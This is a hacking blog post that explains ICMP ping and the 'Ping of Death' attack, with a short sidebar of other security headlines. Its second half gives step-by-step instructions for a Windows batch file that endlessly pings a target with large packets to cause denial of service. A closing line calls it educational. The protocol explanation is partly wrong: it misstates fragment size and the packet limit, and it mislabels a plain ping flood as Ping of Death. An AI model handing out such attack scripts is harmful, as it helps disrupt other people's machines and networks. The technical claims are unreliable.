Categories: hackingnetworks

Ping and Ping of Death – what and how

Ping

is a network software utility that sends a packet to the target machine and the target machine will reply back if it receives that packet. This way we can know that the target is online (connected to the lan or wan). It’s one of the most used utilities for identifying network problems.

MyPc->ICMP Echo request-> Target ->ICMP Echo response-> MyPc


Ping

is sending an ICMP Echo packet request
request and when the target receives this packet will reply back with an ICMP Echo response. The ICMP header starts after the IPv4 header and is identified by IP protocol number. All ICMP packets have 8-bytes header and variable-sized data section. The first 4 bytes of the header have fixed format, while the last 4 bytes depend on the type/code of that ICMP packet.
A ping packet can have up to 65536 bytes. This is the negative side of the ping packet. Someone can increase the size of the ping packet unnaturally, forming a malformed ping packet. Sending malformed ping packets is a type of attack and is called “Ping of death” attack.

How Ping of Death attack works?

The packets are sent and received in fragments. One fragment is of 8 octet size. So, the target machine will reassemble the malformed packets.
The whole assembled packet can cause buffer overflow at the target machine especially when sending so many packets that the target gets over-utilized and can crush and hang (Denial of Service)

Perform DoS attack using ping of death!

1. Open Notepad
2. Copy the following lines on the notepad
:loop
                 ping <IP Address> -l 65500 -w 1 -n 1
                 goto :loop
3. Replace <IP Address> with the ip address of the target machine
4. Save the Notepad file. For example pingofdeath.txt
5. Right click on the file and rename it. Rename the extension from .txt to .bat so that your file is now pingofdeath.bat
6. Double click the file and it will popup a cmd window that will start pinging the target ip.

NOTE: this might not work on all computer.

Attacking computers unauthorized is illegal and not recommended in any way. This article is just for educational purposes and you can test it on your own machines 🙂

panosnet

Recent Posts

Linux Maintainers Infected by SSH-Dwelling Backdoor: A Two-Year Compromise

Introduction In a shocking revelation, it has been disclosed that the infrastructure used to maintain…

7 months ago

Cryptic Bitcoin Transaction Unfolds: Revisiting Satoshi Nakamoto’s Genesis Wallet in a $1.17 Million Transaction

Introduction: In the early hours of January 5, the cryptocurrency community was abuzz with speculation…

12 months ago

Emerging Threat: SMTP Smuggling Exploits Flaws in Major Email Servers – how to spoof like a pro!

Summary: A newly identified technique called SMTP smuggling poses a significant threat to email security…

12 months ago

Unraveling the Operation Triangulation Spyware: A Deep Dive into iPhone Exploits

Since 2019, the Operation Triangulation spyware has targeted iPhone devices, exploiting undocumented features within Apple…

12 months ago

curl – SOCKS5 heap buffer overflow – CVE-2023-38545

The Challenge: CVE-2023-38545 In the world of digital security, a formidable adversary has emerged -…

1 year ago

Safeguard Your Confluence for an Urgent Upgrade!

Alert: Safeguard Your Confluence for an Urgent Upgrade! Advisory Release Date: Wednesday, Oct 4th, 2023,…

1 year ago

This website uses cookies.